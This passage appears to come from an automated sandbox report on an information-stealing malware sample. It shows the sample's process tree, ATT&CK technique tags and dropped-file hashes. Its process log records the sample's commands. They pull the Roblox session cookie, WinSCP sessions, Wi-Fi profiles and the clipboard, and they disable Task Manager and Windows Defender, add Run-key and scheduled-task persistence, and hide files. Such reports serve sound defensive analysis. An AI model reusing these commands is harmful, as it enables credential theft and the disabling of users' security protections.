  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5060
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8980
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8812
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2724
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2432
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5960
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7420
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8464
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4864
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:10200
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3040
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6876
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:964
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3740
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:648
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7832
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5080
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7552
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2356
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7908
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7712
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:10124
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:10828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5772
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7708
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5860
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6212
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4376
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:10384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7464
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6004
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3604
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7556
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3020
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8296
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8292
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6332
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7772
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2228
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:10032
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9044
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1224
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2236
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:10356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8304
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5180
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7648
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2892
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:11252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5628
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7480
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7720
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7884
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9720
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6092
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:9532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5188
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6620
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:10064
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4904
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:7932
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9508
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:10048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5424
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2712
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8184
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9376
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:6644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:116
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6316
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9644
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1920
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4452
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:9900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3188
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5204
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2188
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:8544
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5644
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:10024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9848
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:6904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6152
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:10184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9824
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2080
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5640
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3372
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:6292
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9000
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:6580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1704
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:9952
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:10004
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:9176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\b78fKOMNNmuA.vbs"
    3⤵
    PID:6188
  - - C:\Windows\system32\cscript.exe
      cscript C:\Users\Admin\AppData\Roaming\b78fKOMNNmuA.vbs
      4⤵
      PID:8508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
    3⤵
    PID:10084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
    3⤵
    PID:7944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "function Get-AntiVirusProduct {
      4⤵
      PID:9124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
    3⤵
    PID:6860
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:6624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:5896
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
      4⤵
      PID:10328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:7632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:11320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:11792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:11836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Failed' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
    3⤵
    PID:12008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "
      4⤵
      PID:7196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:12020
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:11336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
    3⤵
    PID:12028
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:6268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_Daksa2 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Daksa2.vbs /f"
    3⤵
    PID:12188
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_Daksa2 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Daksa2.vbs /f
      4⤵
      PID:11272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Daksa2.vbs\"""
    3⤵
    PID:12196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Daksa2.vbs\""
      4⤵
      PID:2752
    - - C:\Windows\system32\attrib.exe
        
        "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_Daksa2.vbs
        5⤵
        Views/modifies file attributes
        
        PID:8540
- - C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe
    "C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4340 --field-trial-handle=1696,i,4240940651949948143,4876623791915125659,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    PID:5868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:4144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      PID:11588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
0ff7e1af4cc86e108eef582452b35523

SHA1
c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

SHA256
62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

SHA512
374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
